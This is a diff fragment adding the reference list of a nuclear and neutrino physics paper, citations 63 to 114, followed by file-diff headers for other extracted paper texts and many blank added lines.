1062
+ [63] A. Glick-Magid, C. Forssén, D. Gazda, D. Gazit, P. Gys-
1063
+ bers, and P. Navrátil, Physics Letters B 832, 137259
1064
+ (2022), arXiv:2107.10212.
1065
+ [64] G. H. Sargsyan, K. D. Launey, M. T. Burkey, A. T. Gal-
1066
+ lant, N. D. Scielzo, G. Savard, A. Mercenne, T. Dytrych,
1067
+ D. Langr, L. Varriano, B. Longfellow, T. Y. Hirsh, and
1068
+ J. P. Draayer, Phys. Rev. Lett. 128, 202503 (2022).
1069
+ [65] V. Zelevinsky, N. Auerbach, and B. M. Loc, Phys. Rev.
1070
+ C 96, 044319 (2017).
1071
+ [66] A. Falkowski, M. Gonzalez-Alonso, and O. Naviliat-
1072
+ Cuncic, J. High Energ. Phys. 04, 126.
1073
+ [67] Y. Fukuda, T. Hayakawa, E. Ichihara, K. Inoue, K. Ishi-
1074
+ hara,
1075
+ H. Ishino,
1076
+ Y. Itow,
1077
+ T. Kajita,
1078
+ J. Kameda,
1079
+ S. Kasuga, K. Kobayashi, Y. Kobayashi, Y. Koshio,
1080
+ M. Miura, M. Nakahata, S. Nakayama, A. Okada,
1081
+ K. Okumura, N. Sakurai, M. Shiozawa, Y. Suzuki,
1082
+ Y.
1083
+ Takeuchi,
1084
+ Y.
1085
+ Totsuka,
1086
+ S.
1087
+ Yamada,
1088
+ M.
1089
+ Earl,
1090
+ A. Habig,
1091
+ E. Kearns,
1092
+ M. D. Messier,
1093
+ K. Schol-
1094
+ berg,
1095
+ J.
1096
+ L.
1097
+ Stone,
1098
+ L.
1099
+ R.
1100
+ Sulak,
1101
+ C.
1102
+ W.
1103
+ Walter,
1104
+ M. Goldhaber, T. Barszczxak, D. Casper, W. Gajew-
1105
+ ski, P. G. Halverson, J. Hsu, W. R. Kropp, L. R.
1106
+ Price, F. Reines, M. Smy, H. W. Sobel, M. R. Va-
1107
+ gins, K. S. Ganezer, W. E. Keig, R. W. Ellsworth,
1108
+ S. Tasaka,
1109
+ J. W. Flanagan,
1110
+ A. Kibayashi,
1111
+ J. G.
1112
+ Learned, S. Matsuno, V. J. Stenger, D. Takemori,
1113
+ T. Ishii, J. Kanzaki, T. Kobayashi, S. Mine, K. Naka-
1114
+ mura, K. Nishikawa, Y. Oyama, A. Sakai, M. Sakuda,
1115
+ O. Sasaki, S. Echigo, M. Kohama, A. T. Suzuki,
1116
+ T. J. Haines, E. Blaufuss, B. K. Kim, R. Sanford,
1117
+ R. Svoboda, M. L. Chen, Z. Conner, J. A. Good-
1118
+ man, G. W. Sullivan, J. Hill, C. K. Jung, K. Martens,
1119
+ C. Mauger, C. McGrew, E. Sharkey, B. Viren, C. Yanag-
1120
+ isawa, W. Doki, K. Miyano, H. Okazawa, C. Saji,
1121
+ M. Takahata, Y. Nagashima, M. Takita, T. Yam-
1122
+ aguchi, M. Yoshida, S. B. Kim, M. Etoh, K. Fu-
1123
+ jita,
1124
+ A. Hasegawa,
1125
+ T. Hasegawa,
1126
+ S. Hatakeyama,
1127
+ T. Iwamoto, M. Koga, T. Maruyama, H. Ogawa, J. Shi-
1128
+ rai, A. Suzuki, F. Tsushima, M. Koshiba, M. Nemoto,
1129
+ K. Nishijima, T. Futagami, Y. Hayato, Y. Kanaya,
1130
+ K. Kaneyuki, Y. Watanabe, D. Kielczewska, R. A.
1131
+ Doyle, J. S. George, A. L. Stachyra, L. L. Wai, R. J.
1132
+ Wilkes, and K. K. Young (Super-Kamiokande Collabo-
1133
+ ration), Phys. Rev. Lett. 81, 1562 (1998).
1134
+
1135
+ 10
1136
+ [68] Q. R. Ahmad, R. C. Allen, T. C. Andersen, J. D. An-
1137
+ glin, G. Bühler, J. C. Barton, E. W. Beier, M. Bercov-
1138
+ itch, J. Bigu, S. Biller, R. A. Black, I. Blevis, R. J.
1139
+ Boardman, J. Boger, E. Bonvin, M. G. Boulay, M. G.
1140
+ Bowler, T. J. Bowles, S. J. Brice, M. C. Browne, T. V.
1141
+ Bullard, T. H. Burritt, K. Cameron, J. Cameron, Y. D.
1142
+ Chan, M. Chen, H. H. Chen, X. Chen, M. C. Chon,
1143
+ B. T. Cleveland, E. T. H. Clifford, J. H. M. Cowan,
1144
+ D. F. Cowen, G. A. Cox, Y. Dai, X. Dai, F. Dalnoki-
1145
+ Veress, W. F. Davidson, P. J. Doe, G. Doucas, M. R.
1146
+ Dragowsky, C. A. Duba, F. A. Duncan, J. Dunmore,
1147
+ E. D. Earle, S. R. Elliott, H. C. Evans, G. T. Ewan,
1148
+ J. Farine, H. Fergani, A. P. Ferraris, R. J. Ford, M. M.
1149
+ Fowler, K. Frame, E. D. Frank, W. Frati, J. V. Ger-
1150
+ mani, S. Gil, A. Goldschmidt, D. R. Grant, R. L.
1151
+ Hahn, A. L. Hallin, E. D. Hallman, A. Hamer, A. A.
1152
+ Hamian, R. U. Haq, C. K. Hargrove, P. J. Harvey,
1153
+ R. Hazama, R. Heaton, K. M. Heeger, W. J. Heintzel-
1154
+ man, J. Heise, R. L. Helmer, J. D. Hepburn, H. Heron,
1155
+ J. Hewett, A. Hime, M. Howe, J. G. Hykawy, M. C. P.
1156
+ Isaac, P. Jagam, N. A. Jelley, C. Jillings, G. Jonkmans,
1157
+ J. Karn, P. T. Keener, K. Kirch, J. R. Klein, A. B.
1158
+ Knox, R. J. Komar, R. Kouzes, T. Kutter, C. C. M.
1159
+ Kyba, J. Law, I. T. Lawson, M. Lay, H. W. Lee, K. T.
1160
+ Lesko, J. R. Leslie, I. Levine, W. Locke, M. M. Lowry,
1161
+ S. Luoma, J. Lyon, S. Majerus, H. B. Mak, A. D.
1162
+ Marino, N. McCauley, A. B. McDonald, D. S. Mc-
1163
+ Donald, K. McFarlane, G. McGregor, W. McLatchie,
1164
+ R. M. Drees, H. Mes, C. Mifflin, G. G. Miller, G. Mil-
1165
+ ton, B. A. Moffat, M. Moorhead, C. W. Nally, M. S.
1166
+ Neubauer, F. M. Newcomer, H. S. Ng, A. J. Noble,
1167
+ E. B. Norman, V. M. Novikov, M. O’Neill, C. E. Okada,
1168
+ R. W. Ollerhead, M. Omori, J. L. Orrell, S. M. Oser,
1169
+ A. W. P. Poon, T. J. Radcliffe, A. Roberge, B. C.
1170
+ Robertson, R. G. H. Robertson, J. K. Rowley, V. L.
1171
+ Rusu, E. Saettler, K. K. Schaffer, A. Schuelke, M. H.
1172
+ Schwendener, H. Seifert, M. Shatkay, J. J. Simpson,
1173
+ D. Sinclair, P. Skensved, A. R. Smith, M. W. E. Smith,
1174
+ N. Starinsky, T. D. Steiger, R. G. Stokstad, R. S.
1175
+ Storey, B. Sur, R. Tafirout, N. Tagg, N. W. Tanner,
1176
+ R. K. Taplin, M. Thorman, P. Thornewell, P. T. Trent,
1177
+ Y. I. Tserkovnyak, R. Van Berg, R. G. Van de Water,
1178
+ C. J. Virtue, C. E. Waltham, J.-X. Wang, D. L. Wark,
1179
+ N. West, J. B. Wilhelmy, J. F. Wilkerson, J. Wilson,
1180
+ P. Wittich, J. M. Wouters, and M. Yeh (SNO Collabo-
1181
+ ration), Phys. Rev. Lett. 87, 071301 (2001).
1182
+ [69] B. Abi, T. Albahri, S. Al-Kilani, D. Allspach, L. P.
1183
+ Alonzi, A. Anastasi, A. Anisenkov, F. Azfar, K. Bad-
1184
+ gley, S. Baeßler, I. Bailey, V. A. Baranov, E. Barlas-
1185
+ Yucel, T. Barrett, E. Barzi, A. Basti, F. Bedeschi,
1186
+ A. Behnke, M. Berz, M. Bhattacharya, H. P. Bin-
1187
+ ney, R. Bjorkquist, P. Bloom, J. Bono, E. Bottalico,
1188
+ T. Bowcock, D. Boyden, G. Cantatore, R. M. Carey,
1189
+ J. Carroll, B. C. K. Casey, D. Cauz, S. Ceravolo,
1190
+ R. Chakraborty, S. P. Chang, A. Chapelain, S. Chappa,
1191
+ S. Charity, R. Chislett, J. Choi, Z. Chu, T. E. Chupp,
1192
+ M. E. Convery, A. Conway, G. Corradi, S. Corrodi,
1193
+ L. Cotrozzi, J. D. Crnkovic, S. Dabagov, P. M. De Lur-
1194
+ gio, P. T. Debevec, S. Di Falco, P. Di Meo, G. Di Sci-
1195
+ ascio, R. Di Stefano, B. Drendel, A. Driutti, V. N.
1196
+ Duginov, M. Eads, N. Eggert, A. Epps, J. Esquivel,
1197
+ M. Farooq, R. Fatemi, C. Ferrari, M. Fertl, A. Fiedler,
1198
+ A. T. Fienberg, A. Fioretti, D. Flay, S. B. Foster,
1199
+ H. Friedsam, E. Frlež, N. S. Froemming, J. Fry, C. Fu,
1200
+ C. Gabbanini, M. D. Galati, S. Ganguly, A. Garcia,
1201
+ D. E. Gastler, J. George, L. K. Gibbons, A. Gioiosa,
1202
+ K. L. Giovanetti, P. Girotti, W. Gohn, T. Gorringe,
1203
+ J. Grange, S. Grant, F. Gray, S. Haciomeroglu, D. Hahn,
1204
+ T. Halewood-Leagas, D. Hampai, F. Han, E. Hazen,
1205
+ J. Hempstead, S. Henry, A. T. Herrod, D. W. Hert-
1206
+ zog, G. Hesketh, A. Hibbert, Z. Hodge, J. L. Holzbauer,
1207
+ K. W. Hong, R. Hong, M. Iacovacci, M. Incagli, C. John-
1208
+ stone, J. A. Johnstone, P. Kammel, M. Kargiantoulakis,
1209
+ M. Karuza, J. Kaspar, D. Kawall, L. Kelton, A. Ke-
1210
+ shavarzi, D. Kessler, K. S. Khaw, Z. Khechadoorian,
1211
+ N. V. Khomutov, B. Kiburg, M. Kiburg, O. Kim, S. C.
1212
+ Kim, Y. I. Kim, B. King, N. Kinnaird, M. Korostelev,
1213
+ I. Kourbanis, E. Kraegeloh, V. A. Krylov, A. Kuchib-
1214
+ hotla, N. A. Kuchinskiy, K. R. Labe, J. LaBounty,
1215
+ M. Lancaster, M. J. Lee, S. Lee, S. Leo, B. Li, D. Li,
1216
+ L. Li, I. Logashenko, A. Lorente Campos, A. Lucà,
1217
+ G. Lukicov, G. Luo, A. Lusiani, A. L. Lyon, B. Mac-
1218
+ Coy, R. Madrak, K. Makino, F. Marignetti, S. Mas-
1219
+ troianni, S. Maxfield, M. McEvoy, W. Merritt, A. A.
1220
+ Mikhailichenko, J. P. Miller, S. Miozzi, J. P. Morgan,
1221
+ W. M. Morse, J. Mott, E. Motuk, A. Nath, D. New-
1222
+ ton, H. Nguyen, M. Oberling, R. Osofsky, J.-F. Ostiguy,
1223
+ S. Park, G. Pauletta, G. M. Piacentino, R. N. Pilato,
1224
+ K. T. Pitts, B. Plaster, D. Počanić, N. Pohlman, C. C.
1225
+ Polly, M. Popovic, J. Price, B. Quinn, N. Raha, S. Ra-
1226
+ machandran, E. Ramberg, N. T. Rider, J. L. Ritchie,
1227
+ B. L. Roberts, D. L. Rubin, L. Santi, D. Sathyan,
1228
+ H. Schellman, C. Schlesier, A. Schreckenberger, Y. K.
1229
+ Semertzidis, Y. M. Shatunov, D. Shemyakin, M. Shenk,
1230
+ D. Sim, M. W. Smith, A. Smith, A. K. Soha, M. Sor-
1231
+ bara, D. Stöckinger, J. Stapleton, D. Still, C. Stoughton,
1232
+ D. Stratakis, C. Strohman, T. Stuttard, H. E. Swanson,
1233
+ G. Sweetmore, D. A. Sweigart, M. J. Syphers, D. A.
1234
+ Tarazona, T. Teubner, A. E. Tewsley-Booth, K. Thom-
1235
+ son, V. Tishchenko, N. H. Tran, W. Turner, E. Valetov,
1236
+ D. Vasilkova, G. Venanzoni, V. P. Volnykh, T. Walton,
1237
+ M. Warren, A. Weisskopf, L. Welty-Rieger, M. Whit-
1238
+ ley, P. Winter, A. Wolski, M. Wormald, W. Wu, and
1239
+ C. Yoshikawa (Muon g − 2 Collaboration), Phys. Rev.
1240
+ Lett. 126, 141801 (2021).
1241
+ [70] M.
1242
+ Aker,
1243
+ A.
1244
+ Beglarian,
1245
+ J.
1246
+ Behrens,
1247
+ A.
1248
+ Berlev,
1249
+ U.
1250
+ Besserer,
1251
+ B.
1252
+ Bieringer,
1253
+ F.
1254
+ Block,
1255
+ S.
1256
+ Bobien,
1257
+ M. Böttcher, B. Bornschein, L. Bornschein, T. Brunst,
1258
+ T. S. Caldwell, R. M. D. Carney, L. La Cascio, S. Chilin-
1259
+ garyan, W. Choi, K. Debowski, M. Deffert, M. Descher,
1260
+ D. Díaz Barrero, P. J. Doe, O. Dragoun, G. Drexlin,
1261
+ K. Eitel, E. Ellinger, R. Engel, S. Enomoto, A. Felden,
1262
+ J. A. Formaggio,
1263
+ F. M. Fränkle,
1264
+ G. B. Franklin,
1265
+ F. Friedel, A. Fulst, K. Gauda, W. Gil, F. Glück,
1266
+ R. Grössle, R. Gumbsheimer, V. Gupta, T. Höhn,
1267
+ V. Hannen, N. Haußmann, K. Helbing, S. Hickford,
1268
+ R. Hiller, D. Hillesheimer, D. Hinz, T. Houdy, A. Hu-
1269
+ ber, A. Jansen, C. Karl, F. Kellerer, J. Kellerer,
1270
+ M. Kleifges, M. Klein, C. Köhler, L. Köllenberger,
1271
+ A. Kopmann, M. Korzeczek, A. Kovalík, B. Krasch,
1272
+ H. Krause, N. Kunka, T. Lasserre, T. L. Le, O. Lebeda,
1273
+ B. Lehnert, A. Lokhov, M. Machatschek, E. Malcherek,
1274
+ M. Mark, A. Marsteller, E. L. Martin, C. Melzer,
1275
+ A. Menshikov, S. Mertens, J. Mostafa, K. Müller,
1276
+ H. Neumann, S. Niemes, P. Oelpmann, D. S. Parno,
1277
+ A. W. P. Poon, J. M. L. Poyato, F. Priester, S. Ra-
1278
+ machandran, R. G. H. Robertson, W. Rodejohann,
1279
+ M. Röllig, C. Röttele, C. Rodenbeck, M. Ryšavý,
1280
+
1281
+ 11
1282
+ R. Sack, A. Saenz, P. Schäfer, A. Schaller née Pollithy,
1283
+ L. Schimpf, K. Schlösser, M. Schlösser, L. Schlüter,
1284
+ S. Schneidewind, M. Schrank, B. Schulz, A. Schwem-
1285
+ mer, M. Šefčík, V. Sibille, D. Siegmann, M. Slezák,
1286
+ F. Spanier, M. Steidl, M. Sturm, M. Sun, D. Tcher-
1287
+ niakhovski, H. H. Telle, L. A. Thorne, T. Thümmler,
1288
+ N. Titov, I. Tkachev, K. Urban, K. Valerius, D. Vénos,
1289
+ A. P. Vizcaya Hernández, C. Weinheimer, S. Welte,
1290
+ J. Wendel, J. F. Wilkerson, J. Wolf, S. Wüstling,
1291
+ J. Wydra, W. Xu, Y.-R. Yen, S. Zadoroghny, G. Zeller,
1292
+ and T. K. Collaboration, Nature Physics 18, 160 (2022).
1293
+ [71] A. A. Esfahani et al. (Project 8), in 2022 Snowmass
1294
+ Summer Study (2022) arXiv:2203.07349 [nucl-ex].
1295
+ [72] C. M. Cattadori, M. De Deo, M. Laubenstein, L. Pan-
1296
+ dola, and V. I. Tretyak, Physics of Atomic Nuclei 70,
1297
+ 127 (2007).
1298
+ [73] M. T. Mustonen and J. Suhonen, J. Phys. G: Nucl. Part.
1299
+ Phys. 37, 064008 (2010).
1300
+ [74] M. T. Mustonen and J. Suhonen, AIP Conf. Proc. 1304,
1301
+ 401 (2010).
1302
+ [75] M. Mustonen and J. Suhonen, Physics Letters B 703,
1303
+ 370 (2011).
1304
+ [76] J. Haaranen, M.and Suhonen, The European Physical
1305
+ Journal A 49, 93 (2013).
1306
+ [77] J. Suhonen, Physica Scripta 89, 054032 (2014).
1307
+ [78] N. D. Gamage, R. Bhandari, M. H. Gamage, R. Sandler,
1308
+ and M. Redshaw, Hyp. Int. 240, 43 (2019).
1309
+ [79] D. K. Keblbeck, R. Bhandari, N. D. Gamage, M. H.
1310
+ Gamage, and M. Redshaw, arXiv:2201.08790 (2022).
1311
+ [80] M. Horana Gamage, R. Bhandari, G. Bollen, N. D.
1312
+ Gamage,
1313
+ A. Hamaker,
1314
+ D. Puentes,
1315
+ M. Redshaw,
1316
+ R. Ringle, S. Schwarz, C. S. Sumithrarachchi, and
1317
+ I. Yandow, arXiv:2208.11182 (2022).
1318
+ [81] M. Ramalho, Z. Ge, T. Eronen, D. A. Nesterenko,
1319
+ J. Jaatinen, A. Jokinen, A. Kankainen, J. Kostensalo,
1320
+ J. Kotila, M. I. Krivoruchenko, J. Suhonen, K. S. Tyrin,
1321
+ and V. Virtanen, Phys. Rev. C 106, 015501 (2022).
1322
+ [82] Z. Ge, T. Eronen, A. de Roubin, K. Tyrin, L. Canete,
1323
+ S. Geldhof, A. Jokinen, A. Kankainen, J. Kostensalo,
1324
+ J. Kotila, M. Krivoruchenko, I. Moore, D. Nesterenko,
1325
+ J. Suhonen, and M. Vilén, Physics Letters B 832,
1326
+ 137226 (2022).
1327
+ [83] T. Eronen,
1328
+ Z. Ge,
1329
+ A. de Roubin,
1330
+ M. Ramalho,
1331
+ J. Kostensalo, J. Kotila, O. Beliushkina, C. Delafosse,
1332
+ S. Geldhof,
1333
+ W. Gins,
1334
+ M. Hukkanen,
1335
+ A. Jokinen,
1336
+ A. Kankainen, I. Moore, D. Nesterenko, M. Stryjczyk,
1337
+ and J. Suhonen, Physics Letters B 830, 137135 (2022).
1338
+ [84] Z. Ge, T. Eronen, K. S. Tyrin, J. Kotila, J. Kosten-
1339
+ salo, D. A. Nesterenko, O. Beliuskina, R. de Groote,
1340
+ A. de Roubin,
1341
+ S. Geldhof,
1342
+ W. Gins,
1343
+ M. Hukka-
1344
+ nen, A. Jokinen, A. Kankainen, A. Koszorús, M. I.
1345
+ Krivoruchenko, S. Kujanpää, I. D. Moore, A. Rag-
1346
+ gio, S. Rinta-Antila, J. Suhonen, V. Virtanen, A. P.
1347
+ Weaver, and A. Zadvornaya, Phys. Rev. Lett. 127,
1348
+ 272301 (2021).
1349
+ [85] A. de Roubin, J. Kostensalo, T. Eronen, L. Canete, R. P.
1350
+ de Groote, A. Jokinen, A. Kankainen, D. A. Nesterenko,
1351
+ I. D. Moore, S. Rinta-Antila, J. Suhonen, and M. Vilén,
1352
+ Phys. Rev. Lett. 124, 222503 (2020).
1353
+ [86] D. Carney, K. G. Leach, and D. C. Moore,
1354
+ (2022),
1355
+ arXiv:2207.05883 [hep-ex].
1356
+ [87] M. A. Acero et al., (2022), arXiv:2203.07323 [hep-ex].
1357
+ [88] S. Dodelson and L. M. Widrow, Phys. Rev. Lett. 72, 17
1358
+ (1994).
1359
+ [89] R.
1360
+ Adhikari,
1361
+ M.
1362
+ Agostini,
1363
+ N.
1364
+ A.
1365
+ Ky,
1366
+ T.
1367
+ Araki,
1368
+ M. Archidiacono,
1369
+ M. Bahr,
1370
+ J. Baur,
1371
+ J. Behrens,
1372
+ F. Bezrukov, P. B. Dev, D. Borah, A. Boyarsky,
1373
+ A. de Gouvea, C. de S. Pires, H. de Vega, A. Dias,
1374
+ P. D. Bari, Z. Djurcic, K. Dolde, H. Dorrer, M. Durero,
1375
+ O. Dragoun,
1376
+ M. Drewes,
1377
+ G. Drexlin,
1378
+ C. DÃŒll-
1379
+ mann, K. Eberhardt, S. Eliseev, C. Enss, N. Evans,
1380
+ A. Faessler, P. Filianin, V. Fischer, A. Fleischmann,
1381
+ J.
1382
+ Formaggio,
1383
+ J.
1384
+ Franse,
1385
+ F.
1386
+ Fraenkle,
1387
+ C.
1388
+ Frenk,
1389
+ G. Fuller, L. Gastaldo, A. Garzilli, C. Giunti, F. Glück,
1390
+ M. Goodman,
1391
+ M. Gonzalez-Garcia,
1392
+ D. Gorbunov,
1393
+ J. Hamann, V. Hannen, S. Hannestad, S. Hansen,
1394
+ C. Hassel, J. Heeck, F. Hofmann, T. Houdy, A. Hu-
1395
+ ber, D. Iakubovskyi, A. Ianni, A. Ibarra, R. Jacobsson,
1396
+ T. Jeltema, J. Jochum, S. Kempf, T. Kieck, M. Ko-
1397
+ rzeczek, V. Kornoukhov, T. Lachenmaier, M. Laine,
1398
+ P. Langacker, T. Lasserre, J. Lesgourgues, D. Lhuil-
1399
+ lier, Y. Li, W. Liao, A. Long, M. Maltoni, G. Mangano,
1400
+ N. Mavromatos, N. Menci, A. Merle, S. Mertens, A. Mi-
1401
+ rizzi, B. Monreal, A. Nozik, A. Neronov, V. Niro,
1402
+ Y. Novikov, L. Oberauer, E. Otten, N. Palanque-
1403
+ Delabrouille, M. Pallavicini, V. Pantuev, E. Papaster-
1404
+ gis, S. Parke, S. Pascoli, S. Pastor, A. Patwardhan,
1405
+ A. Pilaftsis, D. Radford, P.-O. Ranitzsch, O. Rest,
1406
+ D. Robinson, P. R. da Silva, O. Ruchayskiy, N. Sanchez,
1407
+ M. Sasaki,
1408
+ N. Saviano,
1409
+ A. Schneider,
1410
+ F. Schnei-
1411
+ der, T. Schwetz, S. Schönert, S. Scholl, F. Shankar,
1412
+ R. Shrock, N. Steinbrink, L. Strigari, F. Suekane,
1413
+ B. Suerfu, R. Takahashi, N. T. H. Van, I. Tkachev,
1414
+ M. Totzauer, Y. Tsai, C. Tully, K. Valerius, J. Valle,
1415
+ D. Venos, M. Viel, M. Vivier, M. Wang, C. Weinheimer,
1416
+ K. Wendt, L. Winslow, J. Wolf, M. Wurm, Z. Xing,
1417
+ S. Zhou, and K. Zuber, Journal of Cosmology and As-
1418
+ troparticle Physics 2017 (01), 025.
1419
+ [90] A. Boyarsky, M. Drewes, T. Lasserre, S. Mertens, and
1420
+ O. Ruchayskiy, Progress in Particle and Nuclear Physics
1421
+ 104, 1 (2019).
1422
+ [91] K. G. Leach and S. Friedrich (BeEST), in 19th Interna-
1423
+ tional Workshop on Low Temperature Detectors (2021)
1424
+ arXiv:2112.02029 [nucl-ex].
1425
+ [92] C. J. Martoff et al., Quantum Sci. Technol. 6, 024008
1426
+ (2021).
1427
+ [93] M. Fallot, S. Cormon, M. Estienne, A. Algora, V. M.
1428
+ Bui, A. Cucoanes, M. Elnimr, L. Giot, D. Jordan,
1429
+ J. Martino, A. Onillon, A. Porta, G. Pronost, A. Re-
1430
+ moto, J. L. Taín, F. Yermia, and A.-A. Zakari-Issoufou,
1431
+ Phys. Rev. Lett. 109, 202504 (2012).
1432
+ [94] A. C. Hayes, J. L. Friar, G. T. Garvey, G. Jungman, and
1433
+ G. Jonkmans, Phys. Rev. Lett. 112, 202501 (2014).
1434
+ [95] A. A. Sonzogni, T. D. Johnson, and E. A. McCutchan,
1435
+ Phys. Rev. C 91, 011301 (2015).
1436
+ [96] B. C. Rasco, M. Wolińska-Cichocka, A. Fijałkowska,
1437
+ K. P. Rykaczewski, M. Karny, R. K. Grzywacz, K. C.
1438
+ Goetz, C. J. Gross, D. W. Stracener, E. F. Zganjar,
1439
+ J. C. Batchelder, J. C. Blackmon, N. T. Brewer, S. Go,
1440
+ B. Heffron, T. King, J. T. Matta, K. Miernik, C. D. Ne-
1441
+ saraja, S. V. Paulauskas, M. M. Rajabali, E. H. Wang,
1442
+ J. A. Winger, Y. Xiao, and C. J. Zachary, Phys. Rev.
1443
+ Lett. 117, 092501 (2016).
1444
+ [97] A. Fijałkowska, M. Karny, K. P. Rykaczewski, B. Rasco,
1445
+ R. Grzywacz, C. J. Gross, M. Woli ńska Cichocka,
1446
+ K. C. Goetz, D. W. Stracener, W. Bielewski, R. Goans,
1447
+ J. H. Hamilton, J. W. Johnson, C. Jost, M. Madurga,
1448
+ K. Miernik, D. Miller, S. W. Padgett, S. V. Paulauskas,
1449
+
1450
+ 12
1451
+ A. V. Ramayya, and E. F. Zganjar, Phys. Rev. Lett.
1452
+ 119, 052503 (2017).
1453
+ [98] M. Estienne, M. Fallot, A. Algora, J. Briz-Monago,
1454
+ V. M. Bui, S. Cormon, W. Gelletly, L. Giot, V. Guadilla,
1455
+ D. Jordan, L. Le Meur, A. Porta, S. Rice, B. Rubio, J. L.
1456
+ Taín, E. Valencia, and A.-A. Zakari-Issoufou, Phys. Rev.
1457
+ Lett. 123, 022502 (2019).
1458
+ [99] L. Hayen, J. Kostensalo, N. Severijns, and J. Suhonen,
1459
+ Phys. Rev. C 100, 054323 (2019).
1460
+ [100] M. Stukel, L. Hariasz, P. C. F. Di Stefano, B. C. Rasco,
1461
+ K. P. Rykaczewski, N. T. Brewer, D. W. Stracener,
1462
+ Y. Liu, Z. Gai, C. Rouleau, J. Carter, J. Kostensalo,
1463
+ J. Suhonen, H. Davis, E. D. Lukosi, K. C. Goetz, R. K.
1464
+ Grzywacz, M. Mancuso, F. Petricca, A. Fijałkowska,
1465
+ M. Wolińska-Cichocka, J. Ninkovic, P. Lechner, R. B.
1466
+ Ickert, L. E. Morgan, P. R. Renne, and I. Yavin, Rare
1467
+ 40k decay with implications for fundamental physics and
1468
+ geochronology (2022).
1469
+ [101] M. Horoi and A. Neacsu, Phys. Rev. C 98, 035502
1470
+ (2018).
1471
+ [102] M. Horoi and A. Neacsu, Phys. Rev. D 93, 113014
1472
+ (2016).
1473
+ [103] R. A. Sen’kov and M. Horoi, Phys. Rev. C 93, 044334
1474
+ (2016).
1475
+ [104] B. A. Brown, D. L. Fang, and M. Horoi, Phys. Rev. C
1476
+ 92, 041301 (2015).
1477
+ [105] M. Ramalho, J. Suhonen, J. Kostensalo, G. A. Al-
1478
+ calá, A. Algora, M. Fallot, A. Porta, and A.-A. Zakari-
1479
+ Issoufou, Phys. Rev. C 106, 024315 (2022).
1480
+ [106] M. Fallot, B. Littlejohn, and P. Dimitriou, Antineutrino
1481
+ spectra and their applications, Tech. Rep. INDC(NDS)-
1482
+ 0786 (International Atomic Energy Agency, 2019).
1483
+ [107] B. Fornal and B. Grinstein, Phys. Rev. Lett. 120,
1484
+ 191801 (2018).
1485
+ [108] J. M. Berryman, S. Gardner, and M. Zakeri, Symmetry
1486
+ 14, 10.3390/sym14030518 (2022).
1487
+ [109] M. Pfützner and K. Riisager, Phys. Rev. C 97, 042501
1488
+ (2018).
1489
+ [110] Y. Ayyad, B. Olaizola, W. Mittig, G. Potel, V. Zelevin-
1490
+ sky, M. Horoi, S. Beceiro-Novo, M. Alcorta, C. An-
1491
+ dreoiu,
1492
+ T. Ahn,
1493
+ M. Anholm,
1494
+ L. Atar,
1495
+ A. Babu,
1496
+ D. Bazin, N. Bernier, S. S. Bhattacharjee, M. Bowry,
1497
+ R. Caballero-Folch, M. Cortesi, C. Dalitz, E. Dunling,
1498
+ A. B. Garnsworthy, M. Holl, B. Kootte, K. G. Leach,
1499
+ J. S. Randhawa, Y. Saito, C. Santamaria, P. Šiuryt˙e,
1500
+ C. E. Svensson, R. Umashankar, N. Watwood, and
1501
+ D. Yates, Phys. Rev. Lett. 123, 082501 (2019).
1502
+ [111] Y. Ayyad, W. Mittig, T. Tang, B. Olaizola, G. Po-
1503
+ tel, N. Rijal, N. Watwood, H. Alvarez-Pol, D. Bazin,
1504
+ M. Caamaño, J. Chen, M. Cortesi, B. Fernández-
1505
+ Domínguez, S. Giraud, P. Gueye, S. Heinitz, R. Jain,
1506
+ B. P. Kay, E. A. Maugeri, B. Monteagudo, F. Ndayis-
1507
+ abye, S. N. Paneru, J. Pereira, E. Rubino, C. Santa-
1508
+ maria, D. Schumann, J. Surbrook, L. Wagner, J. C.
1509
+ Zamora, and V. Zelevinsky, Phys. Rev. Lett. 129,
1510
+ 012501 (2022).
1511
+ [112] E. Lopez-Saavedra, S. Almaraz-Calderon, B. W. Asher,
1512
+ L. T. Baby, N. Gerken, K. Hanselman, K. W. Kemper,
1513
+ A. N. Kuchera, A. B. Morelock, J. F. Perello, E. S.
1514
+ Temanson, A. Volya, and I. Wiedenhöver, Phys. Rev.
1515
+ Lett. 129, 012502 (2022).
1516
+ [113] K. Riisager, M. J. G. Borge, J. A. Briz, M. Carmona-
1517
+ Gallardo, O. Forstner, L. M. Fraile, H. O. U. Fynbo,
1518
+ A. G. Camacho, J. G. Johansen, B. Jonson, M. V. Lund,
1519
+ J. Lachner, M. Madurga, S. Merchel, E. Nacher, T. Nils-
1520
+ son, P. Steier, O. Tengblad, and V. Vedia, The European
1521
+ Physical Journal A 56, 100 (2020).
1522
+ [114] H. Savajols, private communication.
1523
+
5NE2T4oBgHgl3EQfkAfy/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
7dE2T4oBgHgl3EQf7gj3/content/tmp_files/2301.04211v1.pdf.txt ADDED
@@ -0,0 +1,1585 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
